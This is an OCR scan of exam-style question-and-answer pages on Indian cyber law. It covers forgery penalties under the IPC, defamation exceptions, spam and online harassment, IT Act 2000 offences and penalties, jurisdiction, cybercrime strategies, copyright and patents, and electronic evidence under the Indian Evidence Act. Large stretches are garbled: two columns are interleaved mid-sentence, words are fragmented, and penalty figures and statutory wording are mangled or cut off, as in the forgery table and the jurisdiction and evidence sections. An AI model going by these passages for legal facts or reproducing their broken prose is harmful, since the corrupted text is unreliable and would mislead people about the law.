Forgery Imprisonment for a term which 
may be extended to two years, 
or with fine or both. 

Acts amounting to = 

making a false 


document. 

Forgery of records of — | Imprisonment for a term which 
Court or of public may be extended to seven years 
registrar. and fine. 


Forgery for the purpose |Imprisonment for a term which 

of cheating. may be extended to seven years 
and fine. 

Forgery for the purpose |Imprisonment upto three years 

of harming reputation. |and fine. 

When a false document = 

is a forged document. 

Using a forged docu- 

ment as genuine. 


Imprisonment for a term which 
may be extended to two years, 
or with fine, or both. 
Imprisonment for a term which 
may be extended to seven years 
and fine. 


Counterfeiting device 
or mark used for auth- 
enticating documents 
other than those descri- 
bed under section 467, 
or possessing counterfeit 
marked material. 
Fraudlent cancellation, 
destruction, etc. of a 
valuable security etc. 


Imprisonment for life or impri- 

sonment for a term which may 

be extended to seven years and 
fine. 

Falsification of accounts.| Imprisonment for a term which 
may be extended to seven years 
or with fine or both. 

Acts amounting to using e 

a false property mark. 
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Imprisonment for a ter whi 
may be extended to one ye ich 
with fine or both, Aror 
Imprisonment for a t , 
may be extended to ius hich 
or with fine or both, ^ Jas 
Imprisonment upto t 
and fine. 
Imprisonment for a te ; 
may be extended upto the a 
years or with fine or both 
Imprisonment for a term ' 
may be extended to o 
with fine or both. 


Punishment for using a 
false property mark. 


(xvii)| 483 | Counterfeiting a property 


mark used by another. 


Counterfeiting a mark 

used by a public servant. 
Making or possession of 
any instrument for coun- 
terfeiting a property mark. 
Tampering with property 
mark with the intention 
to cause injury. 


(xviii)| 484 


hree Years 


(xix) | 485 


(xx) 489 


Tm which 


Q11. What kind of statements are not considered as offence of def, 


Ans. Statements which fall under the following ten exceptions are M 
considered as offence of defamation — 
(i) If a statement is good for public and is true in ¢ 


ne year or | 


famation> | 


Oncem of, | 


person. It means that a statement that is true but harms the reputation ic 


defamatory until and unless it is for the good of public. 

(ii) When the functions of public servant are discharged then the 
opinion regarding the conduct by him in good faith, or regarding his Character 
only like his character appears in that conduct. 

(iii) The report or result of the proceedings of the court of justice 
published. i 

(iv) When a person touches a question then the opinion in good faith 
regarding the conduct of him/her. 

(v) The advantage of any case, civil or criminal, which has been 


decided by the court of justice, or regarding the conduct of a Person as a party, 


witness or agent, in any such case, it is good for public, 


(Vi) The advantage of any performance, submitted to the public by | 


author for judgement, or regarding the character of another unless his character 
appears in such performance, if it is good for public, 

(vii) Passing any censure on the conduct of that other in matters bya 
person having authority over another in good faith. 

(viii)Statements against any person to any of those who have lawful 


authority over that person with ; : 
i respect to the subjec cusation 
made in good faith. ect matter of the ac 


(ix) Statements, made in 


ood faith fc i interest 
of the person making it, on the dian iE 


racter of another. 


| — 


ution, conveyed by a person against another which is intended 
(QA. person to whom it is conveyed, in good faith. 
n good e defamation, attempt to balance the democratic freedom of 
for pe law ° for public good, by providing above given exceptions. 
nd expression 
eech 2! atis e-mail abusing ? How can the e-mail abusing be reduced? 

n "m licited e-mail, which is also known as spam, is an increasing 

ns. a at] Our valuable time is robbed by e-mail spam. Network 

problem in onsumed and storage space on our servers are used by e-mail 
sourc! 
Spams. 1 with e-mail spam, it is best not to reply to a spam message for any 
To dea lidates our e-mail address and will be resulted in more spams. 

reason, this va ublishing web pages, we should use HTML sequence @ in 
When we are P bol in e-mail addresses to fool e-mail harvesters. The spam 
jace of the @ sym>0 "5 -mail ab ilabuse@ui 
P hould be copied to UIS e-mail abuse (or emaila! use@uis.edu). We 
messages $ any incoming messages with recurring detectable and traceable 
je pee e-mail to the UIS e-mail abuse mailbox. The offending e-mail 
origins. at be copied and not forwarded to preserve Internet headers. These 
ats allow us to trace the route. Steps to copy the e-mail message to UIS 
are as follows — n , ERR 

G) InMS outlook left click on the e-mail message so that it is highlighted. 

(ii) Click on edit on outlook menu bar. 

(iii) Click on copy. 

(iv) Now open a new mail message. 

(v) Type UIS e-mail abuse or emailabuse@uis.edu in the to field. 

(vi) Type e-mail abuse in the subject field. 

(vii) Now click in the message area of the new message. 

(viii) Now click on edit on the outlook menu bar. 

(ix) Now click on paste. 

(x) Click send. 

(xi) Now use the delete key. 

(xii) Use the junk and adult content filters in outlook (available under 
tools, organize). 

A number of methods are used by criminals of e-mail spam, which make 
it very difficult for network and e-mail administrators to block their messages. 
The criminals often send their messages from a borrowed e-mail address, i.e. 
Sending the message as someone else. Then they will change that address 
Continuously so as to prevent their messages from being blocked. Spammers 

[we Spoof an e-mail address so as to make it appear to have originated from a 
SBilimate website, google.com or hotmail.com. Spammers often relay their 


m i i 
t “sages through three or four e-mail servers to make tracing messages back 
9 the source difficult. 
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Q.13. What is harassment ? 

Ans. Harassment through Internet has been spread eve 
à person disturbed by making a lot of call or sending e-mails LN Tom 
of call’ girls, or some pornographic material or such other thin for conta’ 
is not related to, is known as harassment. Harassment may is thatthe Pers 
crime in near future. The problem of harassment is not restricted o^ Or Cy E 
stars and famous people even ordinary users of the Internet By ' o fly 
medium for harassing their enemies. Š using q is 


CTE a 
OTHER IT ACT OFFENCES, MONETARY PENALTIES ` 
Li 


JURISDICTION AND CYBERCRIMES, NATURE OF 


CRIMINALITY, STRATEGIES TO TACKLE CYB 
''.. AND TRENDS ERCRIME 


Q.14. Explain the IT Act offences other than cyber crimes like 


teenage web vandals, cyberfraud and cheating etc. hacking 


: Ans. There are certain other offences besides the cybercrime 

discussed, in the IT Act 2000. When the source code of computer s 
used for a computer, computer network, computer program or Gore. EUR 
is altered or destroyed intentionally by a person, even the Metis At 
code is required to be kept or maintained by law for the time being af - | 
then this is said, the offence of tampering with computer source diner | 
l This offence is punishable under section 66 of IT Act 2000 vii 
imprisonment for a term which may be extended upto three years or with ^s 
which may be extended upto X 2 Lakh or both. If the person fails to com i 
with the order of the Controller of Certifying Authorities, is punishable "vid 
section 68 of IT Act 2000, with imprisonment for a term not exceeding three 
years or with a fine upto € 2 Lakh or both. 

l The controller of certifying authorities may direct any of the government 
to intercept any information transmitted through any computer, if he is satisfied 
that it is necessary in respect to integrity and sovereignty of India. Every user 
or incharge of computer will have to provide all facilities and help to decrypt 
the information. If anyone denies to assist the agency then he/she shall be 
punishable under section 69 of the IT Act 2000, with imprisonment for a term 
which may be extended upto 7 years. 

A person who breaks the confidentiality and privacy, shall be liable for 
punishment, with imprisonment for a term which may be extended upto two 
years, or with fine which may be extended to € 1 Lakh or both, under section 
72 of IT Act 2000. 

Ifa digital signature certificate is issued with the knowledge that issuing 
authority listed in the certificate has not issued it or the certificate has be?" 


Nc 


Pp" 


po mone 
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/she shall be liable for a punishment under section 73 of IT 


n he : 
the prisonment for a term which may be extended upto years, or 


keo» 7... 
ev? th im 
pct 2000 WE! = | Lakh or both. 


"n fine upto ; sed 
with what are monetary penalties ? When a criminal shall be liable to 


tary penalties ? 

ena criminal is punished to pay damages by only penalties for 
nstead of imprisonment, then these penalties are known as 
Ities. There are many contraventions for which a person would 
mom Je to pay damages by the penalties for non-compliance of certain 
be [iab e ts. Ifa person perform any or more ofthe following acts on computer, 
require sermission of owner or in-charge of a computer, then he/she shall 
wittos i p damages by way of compensation not exceeding * | Crore to 
pe liab ir affected, i.e. the victim — 

the pers O He/she accesses a computer, computer system or network for 


/she is not authorized. 
(i) Any data or copies of data extracted, or computer database or 


. formation from computer, or computer system or network is downloaded. 
" ; 
i (iii) Computer viruses on any computer, or computer system or 


Ans. Whe 
offences ! 


the 
netary pena 


which he 


rk are introduced. 
(iv) Any computer or computer system or computer network disrupted. 


(v) Any computer or computer system or network, data, computer 
y other program residing in such computer are damaged by the 


netwo! 


database or an. 


person. ] : 
(vi) Any authorized person denied to access the computer, computer 


system or computer network by him/her. 
(vii) Facilitating access to a computer or computer system or network 


by providing assistance to any other person. 

It is clear that infringements punishable with imprisonment are triable by 
criminal courts, whereas the infringements punishable with penalty or 
compensations have been left for adjudication by an adjudicating officer. For 
the purpose of adjudication of infringements for which compensation or 
penalties are provided, an adjudicating authority has been created separately. 
Any officer who is equivalent or above the rank of director to the Government 
of India or of State Government, shall be appointed by the Central Government. 

0.16. What is the meaning of the term jurisdiction ? 

, Ans. Itis stated in the IT Act 2000, that an offence whether it is committed 
in India or outside of India by any person irrespective of his nationality would 
also be punishable unless or otherwise provided in the act. Though it is clear 
that the act shall be applicable to the offence committed outside India by any 
Person, and if the offence committed involves a computer, computer system or 


computer network located in India. | 
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: The words "act or conduct constituting the offence or contravent 8. Describe the nature/characteristics of cybercrime. 
involves a computer, computer cae pense =e located in Toa Q4 fn characteristics 0 f cybercrime are as follows — 
are very signifi ine jurisdiction of the ct ov Lu Se i ; 
ry significant to determine ju er acts Commi An (i) Since cybercrimes are committed through technology, therefore 


outside India. We have to prove that an act involve a computer or com, ; 
System or computer network is located in India, for the offence whi Mer the cyber eima 


committed outside India, under the IT Act for assuming jurisdiction, ch ig jechnoorats: . , — 
e.g., a website is created any where in the world contains Pornog (ii) Cybercrimes are very efficient because they take no more time in 
Ae T'àphie 


materials. It will not provide IT Act jurisdiction to question the site unle erating and affecting. The cyber criminal may hack a website or play 
5S th 0 


creation or running of the site involves any computer or computer sy " erfrauds within a few seconds or minutes. 


computer network located in India. But if the website uses a server or n or (iii) There are no geographical boundaries, limitations or distances 
network in India the IT Act would assume jurisdiction to question the ` Puter -_ cybercrime. The computers can be hacked in India by the cyber criminal 
iind | t any corner of the world. 


under section 67 of the IT Act. who are à f "e 
Another example is that any computer or computer network is hacked b (iv) The cyber criminals are almost invisible because cybercrimes take 


a person any where in the world, will explain the jurisdiction of the IT Acti lace in cyberspace. All the components of cyber criminality (from preparation 
India, to punish the accused the section 66 of the IT Act would be chan n A execution), take place in cyber world except the cyber criminal physically 
because the his/her act involve a computer in India. S being outside the cyberspace. Since the cyber criminals are everywhere, so the 


0.17. What is the basic legal principle of jurisdiction under crimin risk factor in cyber criminality is very less in compare to traditional crimes. 
al (v) The websites can be destroyed, which were created and maintained 
Ans. The basic legal principle of jurisdiction under the criminal procedyr | With huge investments, or confidential websites can be hacked such as defence 
code, 1973 is that the offences which are committed would be tried and inquired system ofa country by committing cybercrime. So cybercrime can cause harm 
within the courts whose local jurisdiction it was committed. These principles and injury which cannot be imagined. 
will be applied for determining jurisdiction in investigation by the police a; (vi) Cyber criminals have the capacity to affect several countries at 
well as in trial by courts. Whether an offence is committed in more than one the same time, which are different from the place of operation of them, because 
places or party committed in more than one places or party committed in one of invisibility of cybercriminality. 
place and partly in another place or it is continuously and continued to be (vii) The collection of evidences of cybercrime and proving them in 
committed in more than one places or the offence consist of several acts done the court of law is very difficult. 
in different areas, then it may be inquired or tried by the court having jurisdiction (viii) The tools to commit cybercrime can be easily and freely available 
over either of such areas. On the other hand in the acts where it is uncertain in CDs in the market at very minimal charges, so cybercrimes are easy to 
that where the offences was committed, it would also be inquired or tried in commit. 
the i oe Pe ons pens ones areas of uncertainty. 0.19. What are the different strategies to tackle cybercrime ? 
y any reason, which has been 
done, the offence may be inquired or tried into the court of which local 


nal who have deep knowledge of the Internet and computer are 


procedure code ? 


Ans, Various strategies to tackle cybercrimes are as follows — 
(i) The law enforcement agencies should be trained in the 


jurisdiction the act has been done. 
i ae ‘ complicacies of technology, so they can effectively and property conduct their 
e.g., in the case of cyberd : By, y y 
where the defamatory | e apes LE MAE ids ái of the ay investigations. An investigator should be atleast a half IT engineer to bea 
different, will be inquired or tried in court of Ed di Y peepee competent investigator of cybercrime. To detect cybercrimes, technical tools 
» Jurisdiction. | such as tr; . hei igator b id his/h 
There are some certain offen ; EC iced i às trace and trap devices must be used by the investigator besides his/her 
diti places ces which would be inquired or in tried | technical knowledge, 
i hould be in 
e.g., an offenc i : Je T (ii) The law enforcement agencies of different countries s 
n ed " oe 2 criminal misappropriation or of criminal breac h M | Cooperation because there is a tendency of jumping geographical borders. 
o or tried by the court within whose local jurisdici® | (iii) To bring the cybercriminals for trial across borders, the effective 


the offence was committed. | laws of us a ; 
aws of extradition and their implementations are must. 
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(iv) Eneryption and other security technologies should be 
protect against cybercrime. 
(V) It is the responsibility of the IT companies to protect it’, 
systems and networks by using technologies which are secured, The 1 
companies should not depend on the low enforcement agencies to t 
cybercriminals, because it is very difficult, since there is anonymity Provide 


by the Internet. 1 
(vi) The research and development of new security technologies i 
be facilitated and encouraged by the government. To support research a 
development and to facilitate education related to counter cybercrime, there 
should be a funding from government. Su 
(vii) In the IT industry, the victim's are not reporting most of th 
of fear of losing the confidence of customers. Name e 
should report the crime to D 


used to 


cybercrimes, because d 
fame and the loss of business. Every victim 


enforcement a; 


shared by private sectors. l oM 
(viii) One solution to fight against cybercrime is the easy identifi cation 


of netizens. All the contents and interactions on the Internet should be Censored 


it is not recommended. 

0.20. Explain intellectual property right with suitable example, 

(R.GP.V., Noy, 2019) 

Ans. The concept of intellectual property can be traced back to the 
Byzantine empire where monopolies were granted. For instance in greece a 
one year monopoly was given to cooks to exploit their recipes. A Statutory 
legislation in the senate of venice provided exclusive privileges to people who 
invented any machine or process to speed up silk making. Thus, from 
intellectual property being totally alien to the nomadic community came an 
era where every new idea was given protection under the category of intellectual 
property rights. Copyright is known as one of the types of intellectual properties. 
Before going into details of the copyright and related issues in cyberspace, we 
need to know the concept of intellectual property and its importance. To go 
home is to enter a place built and filled with human creativity and invention. 
From a carpet to a sofa, from the washing machine, the refrigerator and the 
telephone, to the music, the books, the paintings, family photographs, everything 
which we live is a product of human creativity. These things are creations of 
the human mind and hence called intellectual property. Today the internet is 
not only used for educational purposes but also for business. 

Intellectual property can be categorized into two categories i.e. industrial | 
property and copyright. Industrial property deals with patents, trademarks, 
geographical indications, designs and semiconductors layout design. On the | 


Wt 


gencies. To deal with cybercrime more effectively the information | sol 
about cybercrime, so as to understand it’s various forms and ways, Must be | 
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ight covers literary, dramatic, artistic, musical, cinematographic 
rding etc. The primary legislations regulating intellectual 
" an india are - The patents Act 1970, the trade marks Act 1999, the 
“op? i em dications of goods (registration and Protection) Act 1999, the 
o 00 0, the semiconductor integrated circuits layout design Act 2000 
gesig pyright Act 1957. 
NT j. Explain the term copyright act and patent law. (R.GPV,, Nov. 2019) 
y) Coprrith tAct- Copyri ght law protects original works of authorship 
ns. din a tangible medium of expression. Works of authorship include 
e m categories — literary works (including computer programs); 
ks (including the accompanying words); dramatic works (including 
y pantomimes and choreographic works; pictorial, 


nd co 
olet vi sound reco! 


graphic, 905 > 
und recordings: igh iginali 
ie basie elements of a copyrigl t are expression and originality. The 
«rinality equirement is met ifthe work is independently created by an author 
origin t copied from others. Further, originality does not require novelty. 
and ars a work will not be denied copyright protection merely because it 
et ioa work previously produced by someone else and, therefore, not 
se el. An author or creator, however, is entitled to a copyright only in the 
expression of a work and not in the idea underlying the work. Consequently, 


copyright does not extend to an idea or fact. at 

Fora work to be eligible for copyright protection, it must be “fixed in any 
tangible medium of expression, now known or later developed, from which 
[it] can be perceived, reproduced, or otherwise communicate[ed], either directly 
or with the aid of a machine or a device. A work is fixed in a tangible medium 
of expression “when its embodiment in a copy or phono record, by or under 
the authority of the author, is sufficiently permanent or stable to permit it to be 
perceived, reproduced, or otherwise communicated for a period of principle, 
or discovery, regardless of the form in which it is described, explained, 
illustrated, or embodied in such work, more than transitory duration. 

A copyright owner’s right to reproduce his or her work is an important 
aspect of the exclusive rights afforded by copyright law. At the same time, it 
allows the owner to preclude all others from making copies of the work. Copies, 
as defined in the copyright act, are material objects in which a work is fixed 
“by any method now known or later developed.” Accordingly, an Internet user 
that makes an unauthorized copy of a copyrighted work is likely to be violating 
the copyright owner’s rights. 

.. A copyright owner also has the exclusive right to incorporate the work 
into derivative works and to exclude others from creating works based on his 
or her other work. The right of distribution assures the copyright owner of his 
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or her right to the first distribution of the work. Thereafter, however, the first 
sale doctrine — which attempts to strike a balance between providing the 
copyright owner with the benefits of the copyright protection and permitting 
unimpeded circulation of the work — entitles the owner of a copy of a work to 
sell or otherwise dispose of the possession of his or her copy of the work 
without the authority of the copyright owner. 

Patent Law — Patent, in law, isa document issued by a government conferring 
some special right or privilege. In the United States, the term is restricted principally 
to patents for inventions granted under federal statute. The specific attributes of 
novelty of the item for which a patent is sought are called claims. A patent gives 
the inventor the exclusive privilege of using a certain process or of making, using, 
and selling a specific product or device for a specific period of time. 

The patent is issued in the name of the United States under the seal of the 
PTO. It consists of a short title, together with a printed copy of the specifications 
and claims, a patent number, and a grant to the patentee, his or her heirs, and 
assignees for a period of 17 years. For design patents, the period of the patent 
is 14 years. Every patent must be applied for by the actual inventor, and, if two 
or more parties make an invention jointly, they must apply jointly. Patents may 
be transferred from one party to another, and the written assignment is recorded 

in the PTO. 

Once a patent is granted, issues of infringement, the scope of the patent, 
or any other questions that arise out of the grant are within the jurisdiction of 
the U.S. district courts. Infringement consists of wrongfully making, using, or 
selling a patented invention. The law requires that patented articles be marked 
with the patent number; failure to do so will prevent the recovery of damages 
for infringement, unless the patent owner can prove that due notice of such 
infringement was given to the person charged with infringing the patent, who 
continued after such notice to make or sell the patented product. The remedy 
for an infringement is an action for damages or for a restraining injunction, or 
both. The manufacturer OF an itemi for which a patent is sought may mark the 
product “patent pending or patent applied for”; such notice to the public 
affords an opportunity to others who may claim to have invented deos 
products to institute proceedings in the PTO to determine the originality of ihe 
claim of the applicant. dicio 

In general, patent affords protection against infrin 

ction of the government by which it is issued 
.ecure a patent in every country in whic Ee 
os have sen enacted in iie ae a IS desired. 
s the International Convention for the Fs Important 

rotection of 


NOT gement only within 
ne > and it is therefore 
necessary to 

Patent statutes 
international treaty ! 


Industrial Property. 
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italia E MEE NONI EM 
THE INDIAN EVIDENCE ACT OF 1872 Vs INFORMATION | 
TECHNOLOGY ACT 2000 — STATUS OF ELECTRONIC 
RECORDS AS EVIDENCE, PROOF AND MANAGEMENT OF 
ELECTRONIC RECORDS, RELEVANCY ADMISSIBILITY AND 
PROBATIVE VALUE OF E-EVIDENCE M 


Q.1. What do you mean by the term Indian Evidence Act 1872 Vs. 
Information Technology Act 2000 ? 


Ans. The amendments in Indian Evidence Act 1872 have been made in 
the second schedule of the Indian ITA 2000. These amendments were made to 
improve the IT Act 2000. It seems that the maximum amendments have been 
made to the Indian Evidence Act. 


The second schedule in the Indian Evidence Act was named “Amendments 
to the Indian Evidence Act of 1872". The amendments that were made in 
different sections of Indian Evidence Act 1872 to improve IT Act 2000 are as 
follows — 


(i) In Section 3 — 


(a) The words “all documents produced for the inspection of the 
Court” in the definition of “Evidence” would be replaced by the words “all 
documents including electronic records produced for the inspection of the 
Court”, 
(b) The expressions namely, “Certifying authority”, “digital 
“secure electronic record”, “digital signature certificate”, 
“electronic form”, “information”, “electronic records”, “secure digital 
Signature”, “secure electronic record”, and “subscriber” would be inserted 
after the definition of “India” and the meaning of them will be same as assigned 
to them in ITA 2000, 


Signature”, 


(i) In Section 17 — The words “oral or documentary" would be 
"placed by the words “oral or documentary or contained in electronic forr 


Bu. — riii 
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(iii) After Section 22 — The following sections named — "wh 
1 ; i » e 
admission as to contents of electronic records is relevant”, M ong 
“22A. Oral admissions as to the contents of electronic records ar 
e 


relevant, unless the genuineness ofthe electronic record produced is in das 
would be inserted. 


(iv) In Section 34 — The words "Entries in the books of accoy 
including those maintained in an electronic form”, for the words “Entries 
the books of account”, would be replaced. n 


tion” 


(v) In Section 35 — The words “record or an electronic record” would 
be replaced for the word “record”, in both the places, where it occurs, 


(vi) For Section 39 — The following section would be replaced. 
named, “What evidence to be given when statement forms part of i 
conversation, document, electronic record, book or series of letters or Papers, 
By “39. When any statement of which evidence is given forms part of a longer 
statement, or of a conversation or pan of an isolated document, or is contained 
in a document which forms part of a book, or is contained in part of electronic 
record or of a connected series of letters or papers evidence shall be given of 
so much and no more of the statements, conversation, document, electronic 
record, book or series of letters or papers as the Court considers necessary in 
that particular case to the full understanding of the nature and effect of the 
statement, and of the circumstances under which it was made”. 


(vii) After Section 47 — The following section named opinion as to 
digital signature where relevant. 
“47A. When the court has to form, an opinion as to the digital signature 
of any person, the opinion of the certifying authority which has issued the 
Digital Signature Certificate is a relevant fact”, would be inserted. 


(viii) In Section 59 — The words “contents of documents or electronic 
record” would be replaced for the words “contents of documents”. 


(ix) After Section 65 — The following section named special provisions 


as to evidence relating to electronic record. 


*65 A. The contents of electronic records may be proved in accordance 


with the provisions of Section 65 B" would be inserted. 


Q.2. What is the status of electronic records as evidence, before and 


after IT Act 2000 ? 


Ans. Electronic/computer 
Evidence Act, 1872. Hence there 


evidence is a new term not covered in Indian 
is a need of certain amendments in it, There 
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amendments in the Indian Evidence Act, 1872 by the IT Act, 


of the : ; 
many y redundant but also confusing due to this misconception in 


t onl 


| evidence (statement of a witness) and documentary evidence 
ian Evidence Act, | 872. Since there are two types of evidences 
e recognized by the definition of evidence i.e., oral and documentary 
are other things also which are considered as evidence, e.g., a 
ed mit a murder is also an evidence. 

gun iM status of evidence is given to these things and objects by the definition 

«roved' and ‘fact’ though they are not stated in the definition of evidence. 
of P efnition of evidence before the amendment by the IT Act, 2000 was as 


follows — 


The ora 
comes under Ind 


which a 
evidence. There 
to com: 


(i) All statement which are permitted by court or required to be made 
it by witnesses, in relation to matters of fact under inquiry, such 


efore 3 
> ral evidence. 


statements are known as o 

(ii) The documents which are produced for inspection of the court, 
are known as documentary evidence. 

The definitions given above are amended after the IT Act 2000, as — 

(i) All statements which are permitted by court or required to be 
made before it by witnesses, in relation to matters of fact under inquiry, such 
statements are known as oral evidence. 

(ii) The documents including electronic records, which are produced 
for inspection of the court are known as documentary evidence. 

In definitions given above the words ‘including electronic records’ is 
confusing because prior to the IT act, 2000, the electronic records were not 
documentary evidence. 


0.3. Write down the characteristics of electronic record. 
Ans. Two of the odd characteristics of electronic records are as follows — 


" (i) The copy of the electronic record is practically indistinguishable 
om the original one, 


inthe c (ii) Since the original electronic record was first generated and lies 
the Nc ile memory, therefore that computer would have to be brought to 
itmay be 9 Prove the original electronic record by primary evidence, therefore 
0 Practically impossible or causing immense hardships in many cases. 
4. H. 
ow can we prove that the given electronic record is original ? 


Ans, An ; 
| "Ord itse] electronic record must be proved by producing the electronic 


o i 1 : n H 
r the inspection of the court i.e., by primary evidence. In some 


70 Cyber Security 


exceptional cases it is possible that the secondary evidence may be given T 
to the documents. e.g., when the original document has been lost or dest atin, 
" n : . T 
or may be in possession of the person against whom the document is ved 
proved. ' be 
On the basis of primary and secondary evidence the original electron; 
are primary evidence while the computer output/prints are secondary evidenn 
we ioi " Ce, 
However it is difficult to distinguish an original electronic recorq from i 
Dp MA i 
copy, but there is a distinction in two based on legal and conceptual terms, The 
documents which are generated or processed in the computer system, le 


be the original electronic record. 
evidence, the computer system m 


Therefore on the basis of principle of prima 
ay have to be carried to the court Physical. 
for proving that electronic record is original. The court does not force a Person 
to bring the computer/computer system 1n the court for proving the electronic 
record on which that person is relying as evidence, because our legal system ig 
flexible. However the functionality of computer, reliability of the record and 
computer outputs are important aspects. 

Therefore a special rule of evidence for electronic records was provided 
by section 65 B of Indian Evidence Act, 1872, introduced by the IT Act, 2000, 
In section 65 B, if certain conditions are satisfied then certain computer outputs 
of the original electronic record, can be admissible as documentary evidence 
in any proceedings without proof or production of the original electronic record, 


It is stated in section 65 B that information contained in electronic record 
may be in any of the following computer outputs which are produced by the 


computer. 
(i) Information which is printed on paper 


(ii) Information which is stored or copied in any memory devices, | 


such as DVD, memory card etc. 
These computer outputs will also be treated as documents of evidence on 
satisfying certain conditions. The computer outputs given above may be 
produced as proof of the contents of the original electronic record without 
proving or producing the original electronic record. 
Q.5. How can the electronic records be managed as evidence "d 


2 : á i / 
Ans. If the business transactions or e-communications are managed 
rds which 


maintained by the individuals, firms or corporates, as electronic reco 

may be required as evidence in any proceedings then it must be ensured that 
the conditions which are specified in section 65B are satisfied. It is also advise 
them to maintain existing records of compliance of the stipulated conditions 


En. a 


Woulg | 
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in section 65B. The maintenance of records of compliance of the 
jputed is not a legal requirement. It is a legal advice only. These 
d be relevant under the law of evidence and can enhance th 

fthe compliance of section 65B of the Indian Evidence Act ies, 


jven 
f nditions st 
records woul 
P editibility © : 
ven being secondary evidence, the computer outputs, which are satisfying 
required conditions in section 65B, would be considered to be a document 
w Computer outputs can be admissible In any proceedings as evidence of 
TI contents of the original electronic record or of facts. In the fourth wing of 
rt provision. the mode of proving compliance of section 65B of the Indian 
Evidence Act, 1872 is stated — 
«A certificate can do any of the following things in any proceeding where 
ment in evidence is desired to give, mean to say. 
(i) The electronic record which contains the statement is identified 
and the manner is described in which it was produced, 

(ii) Ifany device is involved in the production of that electronic record 
then it may be appropriate for the purpose of showing that the electronic record 
was produced by a computer by giving specification of that device, 

(iii) It deals with any of the matters to which the conditions mentioned 


a state! 


in the sub-section (2) relate, 
and it should be signed by a responsible official position in relation to the 
operation of the relevant device or the management of the relevant activities 
shall be evidence of any matter stated in the certificate". 

The person signing the certificate would require to prove the certificate 
in the court. The signing official may also be cross examined by the otherside. 


Q.6. What do you understand by relevancy of E-evidence ? 


Ans. It is our misunderstanding that if a computer output is admissible 
under section 65B then the some can be produced and proved in evidence. A 
computer output may be admissible or evident, even though it is secondary 
evidence, for representing electronic record in the court. It is sought to be 
proved that a fact is relevant or fact in issue, before can be allowed to be 
produced and proved in only proceedings. The basic principle is that evidence 
= in any proceeding, of existing or non-existing fact in issue and of other 
acts which are declared to be relevant by the Indian Evidence Act. 

e8., if a company JJ Ltd. contain the accounts as electronic record, in 


ni the following entry is given which shows AJ Ltd. to be indebted to JJ 


"Debtor's Account 
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AJ Ltd. ..... €200000/- (for sale and delivery of 10 HP printers on 09, 
2018 @ € 10000/- per printer)" nos; 
In a money recovery suit against AJ Ltd., the JJ Ltd. relies upon the ab, 
given computer record, to prove that AJ Ltd. is indebted to it for E2000 
The relevancy of this record must be satisfied by JJ Ltd. before the comp ^. 


of section 65B. 
Section 34 in Indian E 
“Entries in books of acco 
into which the court has to inquire, 
business, though these statements may no! 


any person with liability”. 
at the above entry can be relevant to evidence, but not 


liance 


vidence Act gives the definition of relevancy à 
S= 


unts are relevant whenever they refer to a matt 
which are regularly kept in the course i 
3 H ° 
t be sufficient evidence alone to Charg 
e 


So, we can say th 
sufficient, to prove the debt without other evidence. 


When a fact is so connected to another as provided in the Indian Evidence 
Act. 1872, then the fact is said relevant. When a fact in issue is connected with 
the facts to form the part of the same transaction then the facts are known as 


relevant facts. 
Q.7. Write a short note on admissibility of electronic record. 


Ans. The admissibility of a fact is also to be shown as well as relevancy 
before any evidence of the same can be cited in any proceedings. Simply | 
admissibility is the permission to cite the evidence. There is a big 
misunderstanding that admissibility and relevancy are synonyms while their 
legal implications are different. There are many facts that may be admissible 
but may not be relevant, e.g. In cross-examination, to charge the credit of a 
witness with crime, the questions permitted to put, though not relevant to the 
controversy, are yet admissible. Or an e-mail sent by a client to his advocate 
saying that the forgery has been committed by him and now he wish that 
advocate defend him. Though this communication is relevant and protected | 
from disclosure but not admissible. Another example, when a person makes a 
confession to a police officer then it is relevant but is not admissible in evidence. 
However when the proofs are discovered in ele of information 
received from the accused person of offence, in the custody of a police officer 
and whether it amounts to a confession or not, so much of such information is | 
distinct from facts discovered, may be proved. For citing the evidence, the 
addmissibility of a fact can be shown, without any exception. Even there are 
exceptions where if a fact is not relevant to the controversy, is considered 25 


admissible. Hence it can be led in evid 
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1 do you mean by authorship of an electronic record ? 

are obtained to be proved by the electronic record 

f admissibility and relevancy and compliance for admissibility 

uter output under section 65B are satisfied, then after satisfying 
in the next step We have to prove the authorship of the electronic 
facte: n electronic record is also a person who may give the 


The author of à 
i at the person is occupying a responsible official position in 
ration of the computer. When the computer was regularly used 


formation, the management of the activities regularly 
he evidence of authorship would be given 


,5. Wha 
B The facts which 


for the Las 


ese 
recor 
certificate th 


pect to ope . 
rocess In 


ried on during the period, then t 


person. , 
If the author of the electronic record is a person other then the above 


id person then the other person would have to give the evidence of the 
a oip of electronic record. For proving a document, the general method 
i call the person who had executed the document, as a witness. The person 
would be require to proved execution, who executed the electronic record, 
or who is otherwise familiar with the execution. The digital signatures would 
be required to be proved as evidence, if an electronic record has been signed 


digitally. 
The contents are proved as the authorship of a document. Though 


that there is a distinction between the facts and the events in 
definition of fact under section 3 ofthe Indian Evidence Act, 


by such 


it should 


be kept in mind 
the contents. The 
is- 
(i) If by sensing any thing, state of thing or relation of thing is being 


perceived. 
(ii) If a person is concious of any mental condition. 


Q.9. What is the probative value of electronic evidence ? Also give the 
fypes of e-evidence. 

Ans. The weight to be given to evidence, which is to be judged with 
regard to circumstances and facts of the case. Depending upon the facts of 
each case, the value to be assigned to any evidence is for the court to decide. 
Ifa fact is believed to either exist by court or its existence is considered so 
Probable that a sensible man ought, to act upon supposition that it exists, 
under the circumstances of a particular case. e.g., if a person claims the 
ownership of Red Fort, by a statement in an e-mail message sent to other 
fee” him/her, then the probative value for this statement, would be 
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There is also an importance of computer generated evidence jn dete 

its probative value, The computer generated evidences are Classified thc 
. i. as 

Tumour (hearsay) and derived. Ti 


The calculations which are done by the computer using Program, 
Softwares itself is known as real evidence. e.g., a computer software inis d 
the EMI for loan account from the principle, rate of interest and time ": ates 
This computation is described as most satisfactory kind of evidence a 
computation is real evidence. The informations supplied to a computer 1* 
external sources is known as rumour (hearsay) evidence, e.g., number ed 
paid, amount paid etc. are external informations which are Supplied to the 


computer by operation. 

The result generated from real and hearsay evidence is derived ¢ 
e.g., loan amount due to pay, number of EMIs to be paid etc. are 
because calculation is used with information supplied by external so 


Videnge 
derived 
Uurces, 
Evidence which is not direct is hearsay evidence. The rule against hearsa 
evidence is not restricted to oral statement and also applies to documents, Phi 
rule hearsay evidence is not admissible in any proceedings. 


PROVING DIGITAL SIGNATURES, PROOF OF ELECTRONIC 
AGREEMENTS, PROVING ELECTRONIC MESSAGES 


Q.10. What is a digital signature ? What are its components and its 
applications ? (R.GP.X., Dec. 2010, June 2011) 
Or 
Explain digital signature. (R.GEV., Dec. 2004, 2005) 

Or 

Write short note on — Digital signatures. 
